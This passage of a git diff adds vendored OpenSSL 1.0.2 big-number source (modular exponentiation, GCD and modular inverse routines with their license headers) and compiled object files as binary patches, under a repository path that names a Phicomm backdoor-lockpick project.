+                !BN_mod_mul_montgomery(val2[i], val2[i - 1], d, mont, ctx))
+                goto err;
+        }
+    }
+
+    /* Now compute the power product, using independent windows. */
+    r_is_one = 1;
+    wvalue1 = 0;                /* The 'value' of the first window */
+    wvalue2 = 0;                /* The 'value' of the second window */
+    wpos1 = 0;                  /* If wvalue1 > 0, the bottom bit of the
+                                 * first window */
+    wpos2 = 0;                  /* If wvalue2 > 0, the bottom bit of the
+                                 * second window */
+
+    if (!BN_to_montgomery(r, BN_value_one(), mont, ctx))
+        goto err;
+    for (b = bits - 1; b >= 0; b--) {
+        if (!r_is_one) {
+            if (!BN_mod_mul_montgomery(r, r, r, mont, ctx))
+                goto err;
+        }
+
+        if (!wvalue1)
+            if (BN_is_bit_set(p1, b)) {
+                /*
+                 * consider bits b-window1+1 .. b for this window
+                 */
+                i = b - window1 + 1;
+                while (!BN_is_bit_set(p1, i)) /* works for i<0 */
+                    i++;
+                wpos1 = i;
+                wvalue1 = 1;
+                for (i = b - 1; i >= wpos1; i--) {
+                    wvalue1 <<= 1;
+                    if (BN_is_bit_set(p1, i))
+                        wvalue1++;
+                }
+            }
+
+        if (!wvalue2)
+            if (BN_is_bit_set(p2, b)) {
+                /*
+                 * consider bits b-window2+1 .. b for this window
+                 */
+                i = b - window2 + 1;
+                while (!BN_is_bit_set(p2, i))
+                    i++;
+                wpos2 = i;
+                wvalue2 = 1;
+                for (i = b - 1; i >= wpos2; i--) {
+                    wvalue2 <<= 1;
+                    if (BN_is_bit_set(p2, i))
+                        wvalue2++;
+                }
+            }
+
+        if (wvalue1 && b == wpos1) {
+            /* wvalue1 is odd and < 2^window1 */
+            if (!BN_mod_mul_montgomery(r, r, val1[wvalue1 >> 1], mont, ctx))
+                goto err;
+            wvalue1 = 0;
+            r_is_one = 0;
+        }
+
+        if (wvalue2 && b == wpos2) {
+            /* wvalue2 is odd and < 2^window2 */
+            if (!BN_mod_mul_montgomery(r, r, val2[wvalue2 >> 1], mont, ctx))
+                goto err;
+            wvalue2 = 0;
+            r_is_one = 0;
+        }
+    }
+    if (!BN_from_montgomery(rr, r, mont, ctx))
+        goto err;
+    ret = 1;
+ err:
+    if ((in_mont == NULL) && (mont != NULL))
+        BN_MONT_CTX_free(mont);
+    BN_CTX_end(ctx);
+    bn_check_top(rr);
+    return (ret);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_exp2.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_exp2.o
new file mode 100644
index 0000000000000000000000000000000000000000..9b2f8d4703b2974858f0a4e79e3ad01d5a788de4
GIT binary patch
literal 4680
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_gcd.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_gcd.c
new file mode 100644
index 0000000..97c55ab
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_gcd.c
@@ -0,0 +1,700 @@
+/* crypto/bn/bn_gcd.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "cryptlib.h"
+#include "bn_lcl.h"
+
+static BIGNUM *euclid(BIGNUM *a, BIGNUM *b);
+
+int BN_gcd(BIGNUM *r, const BIGNUM *in_a, const BIGNUM *in_b, BN_CTX *ctx)
+{
+    BIGNUM *a, *b, *t;
+    int ret = 0;
+
+    bn_check_top(in_a);
+    bn_check_top(in_b);
+
+    BN_CTX_start(ctx);
+    a = BN_CTX_get(ctx);
+    b = BN_CTX_get(ctx);
+    if (a == NULL || b == NULL)
+        goto err;
+
+    if (BN_copy(a, in_a) == NULL)
+        goto err;
+    if (BN_copy(b, in_b) == NULL)
+        goto err;
+    a->neg = 0;
+    b->neg = 0;
+
+    if (BN_cmp(a, b) < 0) {
+        t = a;
+        a = b;
+        b = t;
+    }
+    t = euclid(a, b);
+    if (t == NULL)
+        goto err;
+
+    if (BN_copy(r, t) == NULL)
+        goto err;
+    ret = 1;
+ err:
+    BN_CTX_end(ctx);
+    bn_check_top(r);
+    return (ret);
+}
+
+static BIGNUM *euclid(BIGNUM *a, BIGNUM *b)
+{
+    BIGNUM *t;
+    int shifts = 0;
+
+    bn_check_top(a);
+    bn_check_top(b);
+
+    /* 0 <= b <= a */
+    while (!BN_is_zero(b)) {
+        /* 0 < b <= a */
+
+        if (BN_is_odd(a)) {
+            if (BN_is_odd(b)) {
+                if (!BN_sub(a, a, b))
+                    goto err;
+                if (!BN_rshift1(a, a))
+                    goto err;
+                if (BN_cmp(a, b) < 0) {
+                    t = a;
+                    a = b;
+                    b = t;
+                }
+            } else {            /* a odd - b even */
+
+                if (!BN_rshift1(b, b))
+                    goto err;
+                if (BN_cmp(a, b) < 0) {
+                    t = a;
+                    a = b;
+                    b = t;
+                }
+            }
+        } else {                /* a is even */
+
+            if (BN_is_odd(b)) {
+                if (!BN_rshift1(a, a))
+                    goto err;
+                if (BN_cmp(a, b) < 0) {
+                    t = a;
+                    a = b;
+                    b = t;
+                }
+            } else {            /* a even - b even */
+
+                if (!BN_rshift1(a, a))
+                    goto err;
+                if (!BN_rshift1(b, b))
+                    goto err;
+                shifts++;
+            }
+        }
+        /* 0 <= b <= a */
+    }
+
+    if (shifts) {
+        if (!BN_lshift(a, a, shifts))
+            goto err;
+    }
+    bn_check_top(a);
+    return (a);
+ err:
+    return (NULL);
+}
+
+/* solves ax == 1 (mod n) */
+static BIGNUM *BN_mod_inverse_no_branch(BIGNUM *in,
+                                        const BIGNUM *a, const BIGNUM *n,
+                                        BN_CTX *ctx);
+
+BIGNUM *BN_mod_inverse(BIGNUM *in,
+                       const BIGNUM *a, const BIGNUM *n, BN_CTX *ctx)
+{
+    BIGNUM *A, *B, *X, *Y, *M, *D, *T, *R = NULL;
+    BIGNUM *ret = NULL;
+    int sign;
+
+    if ((BN_get_flags(a, BN_FLG_CONSTTIME) != 0)
+        || (BN_get_flags(n, BN_FLG_CONSTTIME) != 0)) {
+        return BN_mod_inverse_no_branch(in, a, n, ctx);
+    }
+
+    bn_check_top(a);
+    bn_check_top(n);
+
+    BN_CTX_start(ctx);
+    A = BN_CTX_get(ctx);
+    B = BN_CTX_get(ctx);
+    X = BN_CTX_get(ctx);
+    D = BN_CTX_get(ctx);
+    M = BN_CTX_get(ctx);
+    Y = BN_CTX_get(ctx);
+    T = BN_CTX_get(ctx);
+    if (T == NULL)
+        goto err;
+
+    if (in == NULL)
+        R = BN_new();
+    else
+        R = in;
+    if (R == NULL)
+        goto err;
+
+    BN_one(X);
+    BN_zero(Y);
+    if (BN_copy(B, a) == NULL)
+        goto err;
+    if (BN_copy(A, n) == NULL)
+        goto err;
+    A->neg = 0;
+    if (B->neg || (BN_ucmp(B, A) >= 0)) {
+        if (!BN_nnmod(B, B, A, ctx))
+            goto err;
+    }
+    sign = -1;
+    /*-
+     * From  B = a mod |n|,  A = |n|  it follows that
+     *
+     *      0 <= B < A,
+     *     -sign*X*a  ==  B   (mod |n|),
+     *      sign*Y*a  ==  A   (mod |n|).
+     */
+
+    if (BN_is_odd(n) && (BN_num_bits(n) <= (BN_BITS <= 32 ? 450 : 2048))) {
+        /*
+         * Binary inversion algorithm; requires odd modulus. This is faster
+         * than the general algorithm if the modulus is sufficiently small
+         * (about 400 .. 500 bits on 32-bit sytems, but much more on 64-bit
+         * systems)
+         */
+        int shift;
+
+        while (!BN_is_zero(B)) {
+            /*-
+             *      0 < B < |n|,
+             *      0 < A <= |n|,
+             * (1) -sign*X*a  ==  B   (mod |n|),
+             * (2)  sign*Y*a  ==  A   (mod |n|)
+             */
+
+            /*
+             * Now divide B by the maximum possible power of two in the
+             * integers, and divide X by the same value mod |n|. When we're
+             * done, (1) still holds.
+             */
+            shift = 0;
+            while (!BN_is_bit_set(B, shift)) { /* note that 0 < B */
+                shift++;
+
+                if (BN_is_odd(X)) {
+                    if (!BN_uadd(X, X, n))
+                        goto err;
+                }
+                /*
+                 * now X is even, so we can easily divide it by two
+                 */
+                if (!BN_rshift1(X, X))
+                    goto err;
+            }
+            if (shift > 0) {
+                if (!BN_rshift(B, B, shift))
+                    goto err;
+            }
+
+            /*
+             * Same for A and Y.  Afterwards, (2) still holds.
+             */
+            shift = 0;
+            while (!BN_is_bit_set(A, shift)) { /* note that 0 < A */
+                shift++;
+
+                if (BN_is_odd(Y)) {
+                    if (!BN_uadd(Y, Y, n))
+                        goto err;
+                }
+                /* now Y is even */
+                if (!BN_rshift1(Y, Y))
+                    goto err;
+            }
+            if (shift > 0) {
+                if (!BN_rshift(A, A, shift))
+                    goto err;
+            }
+
+            /*-
+             * We still have (1) and (2).
+             * Both  A  and  B  are odd.
+             * The following computations ensure that
+             *
+             *     0 <= B < |n|,
+             *      0 < A < |n|,
+             * (1) -sign*X*a  ==  B   (mod |n|),
+             * (2)  sign*Y*a  ==  A   (mod |n|),
+             *
+             * and that either  A  or  B  is even in the next iteration.
+             */
+            if (BN_ucmp(B, A) >= 0) {
+                /* -sign*(X + Y)*a == B - A  (mod |n|) */
+                if (!BN_uadd(X, X, Y))
+                    goto err;
+                /*
+                 * NB: we could use BN_mod_add_quick(X, X, Y, n), but that
+                 * actually makes the algorithm slower
+                 */
+                if (!BN_usub(B, B, A))
+                    goto err;
+            } else {
+                /*  sign*(X + Y)*a == A - B  (mod |n|) */
+                if (!BN_uadd(Y, Y, X))
+                    goto err;
+                /*
+                 * as above, BN_mod_add_quick(Y, Y, X, n) would slow things
+                 * down
+                 */
+                if (!BN_usub(A, A, B))
+                    goto err;
+            }
+        }
+    } else {
+        /* general inversion algorithm */
+
+        while (!BN_is_zero(B)) {
+            BIGNUM *tmp;
+
+            /*-
+             *      0 < B < A,
+             * (*) -sign*X*a  ==  B   (mod |n|),
+             *      sign*Y*a  ==  A   (mod |n|)
+             */
+
+            /* (D, M) := (A/B, A%B) ... */
+            if (BN_num_bits(A) == BN_num_bits(B)) {
+                if (!BN_one(D))
+                    goto err;
+                if (!BN_sub(M, A, B))
+                    goto err;
+            } else if (BN_num_bits(A) == BN_num_bits(B) + 1) {
+                /* A/B is 1, 2, or 3 */
+                if (!BN_lshift1(T, B))
+                    goto err;
+                if (BN_ucmp(A, T) < 0) {
+                    /* A < 2*B, so D=1 */
+                    if (!BN_one(D))
+                        goto err;
+                    if (!BN_sub(M, A, B))
+                        goto err;
+                } else {
+                    /* A >= 2*B, so D=2 or D=3 */
+                    if (!BN_sub(M, A, T))
+                        goto err;
+                    if (!BN_add(D, T, B))
+                        goto err; /* use D (:= 3*B) as temp */
+                    if (BN_ucmp(A, D) < 0) {
+                        /* A < 3*B, so D=2 */
+                        if (!BN_set_word(D, 2))
+                            goto err;
+                        /*
+                         * M (= A - 2*B) already has the correct value
+                         */
+                    } else {
+                        /* only D=3 remains */
+                        if (!BN_set_word(D, 3))
+                            goto err;
+                        /*
+                         * currently M = A - 2*B, but we need M = A - 3*B
+                         */
+                        if (!BN_sub(M, M, B))
+                            goto err;
+                    }
+                }
+            } else {
+                if (!BN_div(D, M, A, B, ctx))
+                    goto err;
+            }
+
+            /*-
+             * Now
+             *      A = D*B + M;
+             * thus we have
+             * (**)  sign*Y*a  ==  D*B + M   (mod |n|).
+             */
+
+            tmp = A;            /* keep the BIGNUM object, the value does not
+                                 * matter */
+
+            /* (A, B) := (B, A mod B) ... */
+            A = B;
+            B = M;
+            /* ... so we have  0 <= B < A  again */
+
+            /*-
+             * Since the former  M  is now  B  and the former  B  is now  A,
+             * (**) translates into
+             *       sign*Y*a  ==  D*A + B    (mod |n|),
+             * i.e.
+             *       sign*Y*a - D*A  ==  B    (mod |n|).
+             * Similarly, (*) translates into
+             *      -sign*X*a  ==  A          (mod |n|).
+             *
+             * Thus,
+             *   sign*Y*a + D*sign*X*a  ==  B  (mod |n|),
+             * i.e.
+             *        sign*(Y + D*X)*a  ==  B  (mod |n|).
+             *
+             * So if we set  (X, Y, sign) := (Y + D*X, X, -sign),  we arrive back at
+             *      -sign*X*a  ==  B   (mod |n|),
+             *       sign*Y*a  ==  A   (mod |n|).
+             * Note that  X  and  Y  stay non-negative all the time.
+             */
+
+            /*
+             * most of the time D is very small, so we can optimize tmp :=
+             * D*X+Y
+             */
+            if (BN_is_one(D)) {
+                if (!BN_add(tmp, X, Y))
+                    goto err;
+            } else {
+                if (BN_is_word(D, 2)) {
+                    if (!BN_lshift1(tmp, X))
+                        goto err;
+                } else if (BN_is_word(D, 4)) {
+                    if (!BN_lshift(tmp, X, 2))
+                        goto err;
+                } else if (D->top == 1) {
+                    if (!BN_copy(tmp, X))
+                        goto err;
+                    if (!BN_mul_word(tmp, D->d[0]))
+                        goto err;
+                } else {
+                    if (!BN_mul(tmp, D, X, ctx))
+                        goto err;
+                }
+                if (!BN_add(tmp, tmp, Y))
+                    goto err;
+            }
+
+            M = Y;              /* keep the BIGNUM object, the value does not
+                                 * matter */
+            Y = X;
+            X = tmp;
+            sign = -sign;
+        }
+    }
+
+    /*-
+     * The while loop (Euclid's algorithm) ends when
+     *      A == gcd(a,n);
+     * we have
+     *       sign*Y*a  ==  A  (mod |n|),
+     * where  Y  is non-negative.
+     */
+
+    if (sign < 0) {
+        if (!BN_sub(Y, n, Y))
+            goto err;
+    }
+    /* Now  Y*a  ==  A  (mod |n|).  */
+
+    if (BN_is_one(A)) {
+        /* Y*a == 1  (mod |n|) */
+        if (!Y->neg && BN_ucmp(Y, n) < 0) {
+            if (!BN_copy(R, Y))
+                goto err;
+        } else {
+            if (!BN_nnmod(R, Y, n, ctx))
+                goto err;
+        }
+    } else {
+        BNerr(BN_F_BN_MOD_INVERSE, BN_R_NO_INVERSE);
+        goto err;
+    }
+    ret = R;
+ err:
+    if ((ret == NULL) && (in == NULL))
+        BN_free(R);
+    BN_CTX_end(ctx);
+    bn_check_top(ret);
+    return (ret);
+}
+
+/*
+ * BN_mod_inverse_no_branch is a special version of BN_mod_inverse. It does
+ * not contain branches that may leak sensitive information.
+ */
+static BIGNUM *BN_mod_inverse_no_branch(BIGNUM *in,
+                                        const BIGNUM *a, const BIGNUM *n,
+                                        BN_CTX *ctx)
+{
+    BIGNUM *A, *B, *X, *Y, *M, *D, *T, *R = NULL;
+    BIGNUM local_A, local_B;
+    BIGNUM *pA, *pB;
+    BIGNUM *ret = NULL;
+    int sign;
+
+    bn_check_top(a);
+    bn_check_top(n);
+
+    BN_CTX_start(ctx);
+    A = BN_CTX_get(ctx);
+    B = BN_CTX_get(ctx);
+    X = BN_CTX_get(ctx);
+    D = BN_CTX_get(ctx);
+    M = BN_CTX_get(ctx);
+    Y = BN_CTX_get(ctx);
+    T = BN_CTX_get(ctx);
+    if (T == NULL)
+        goto err;
+
+    if (in == NULL)
+        R = BN_new();
+    else
+        R = in;
+    if (R == NULL)
+        goto err;
+
+    BN_one(X);
+    BN_zero(Y);
+    if (BN_copy(B, a) == NULL)
+        goto err;
+    if (BN_copy(A, n) == NULL)
+        goto err;
+    A->neg = 0;
+
+    if (B->neg || (BN_ucmp(B, A) >= 0)) {
+        /*
+         * Turn BN_FLG_CONSTTIME flag on, so that when BN_div is invoked,
+         * BN_div_no_branch will be called eventually.
+         */
+        pB = &local_B;
+        BN_with_flags(pB, B, BN_FLG_CONSTTIME);
+        if (!BN_nnmod(B, pB, A, ctx))
+            goto err;
+    }
+    sign = -1;
+    /*-
+     * From  B = a mod |n|,  A = |n|  it follows that
+     *
+     *      0 <= B < A,
+     *     -sign*X*a  ==  B   (mod |n|),
+     *      sign*Y*a  ==  A   (mod |n|).
+     */
+
+    while (!BN_is_zero(B)) {
+        BIGNUM *tmp;
+
+        /*-
+         *      0 < B < A,
+         * (*) -sign*X*a  ==  B   (mod |n|),
+         *      sign*Y*a  ==  A   (mod |n|)
+         */
+
+        /*
+         * Turn BN_FLG_CONSTTIME flag on, so that when BN_div is invoked,
+         * BN_div_no_branch will be called eventually.
+         */
+        pA = &local_A;
+        BN_with_flags(pA, A, BN_FLG_CONSTTIME);
+
+        /* (D, M) := (A/B, A%B) ... */
+        if (!BN_div(D, M, pA, B, ctx))
+            goto err;
+
+        /*-
+         * Now
+         *      A = D*B + M;
+         * thus we have
+         * (**)  sign*Y*a  ==  D*B + M   (mod |n|).
+         */
+
+        tmp = A;                /* keep the BIGNUM object, the value does not
+                                 * matter */
+
+        /* (A, B) := (B, A mod B) ... */
+        A = B;
+        B = M;
+        /* ... so we have  0 <= B < A  again */
+
+        /*-
+         * Since the former  M  is now  B  and the former  B  is now  A,
+         * (**) translates into
+         *       sign*Y*a  ==  D*A + B    (mod |n|),
+         * i.e.
+         *       sign*Y*a - D*A  ==  B    (mod |n|).
+         * Similarly, (*) translates into
+         *      -sign*X*a  ==  A          (mod |n|).
+         *
+         * Thus,
+         *   sign*Y*a + D*sign*X*a  ==  B  (mod |n|),
+         * i.e.
+         *        sign*(Y + D*X)*a  ==  B  (mod |n|).
+         *
+         * So if we set  (X, Y, sign) := (Y + D*X, X, -sign),  we arrive back at
+         *      -sign*X*a  ==  B   (mod |n|),
+         *       sign*Y*a  ==  A   (mod |n|).
+         * Note that  X  and  Y  stay non-negative all the time.
+         */
+
+        if (!BN_mul(tmp, D, X, ctx))
+            goto err;
+        if (!BN_add(tmp, tmp, Y))
+            goto err;
+
+        M = Y;                  /* keep the BIGNUM object, the value does not
+                                 * matter */
+        Y = X;
+        X = tmp;
+        sign = -sign;
+    }
+
+    /*-
+     * The while loop (Euclid's algorithm) ends when
+     *      A == gcd(a,n);
+     * we have
+     *       sign*Y*a  ==  A  (mod |n|),
+     * where  Y  is non-negative.
+     */
+
+    if (sign < 0) {
+        if (!BN_sub(Y, n, Y))
+            goto err;
+    }
+    /* Now  Y*a  ==  A  (mod |n|).  */
+
+    if (BN_is_one(A)) {
+        /* Y*a == 1  (mod |n|) */
+        if (!Y->neg && BN_ucmp(Y, n) < 0) {
+            if (!BN_copy(R, Y))
+                goto err;
+        } else {
+            if (!BN_nnmod(R, Y, n, ctx))
+                goto err;
+        }
+    } else {
+        BNerr(BN_F_BN_MOD_INVERSE_NO_BRANCH, BN_R_NO_INVERSE);
+        goto err;
+    }
+    ret = R;
+ err:
+    if ((ret == NULL) && (in == NULL))
+        BN_free(R);
+    BN_CTX_end(ctx);
+    bn_check_top(ret);
+    return (ret);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_gcd.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_gcd.o
new file mode 100644
index 0000000000000000000000000000000000000000..93b1d827c42e1593ab3887b54821327cf43d04d9
GIT binary patch
literal 7344
zcmbuE4Qx}_6@af}0}c>BLsJ@{P{TZ$QR>FD)qr+wUScQD$j}ZFKx(MTk0GIn6FKkE
zK>2BB8}Vky)=lfAX;ZsRm6%p(np$nF(wH@VOw~@%ZB<vspICozT}nr#kaZQ=IrqKm
z9EV(K+OG8c?)~n$=bn4+x#!)$zHqdu!r@?|IM^d>yd@}O19Qjg^}Jfos@P2Sxw7yJ
zbwk9wshOwM)`<Cz+7dC}YF)3TKJjX%?ss27;i&nMcx&bfUez*J^(rls)3P9>na2!w
zIC!<N1m@PvYqmsAFGkHzHS=Pr{r7y>iwZUK0*K`sd4u<6ayu(E^NMDk2W6lt+vv{Z
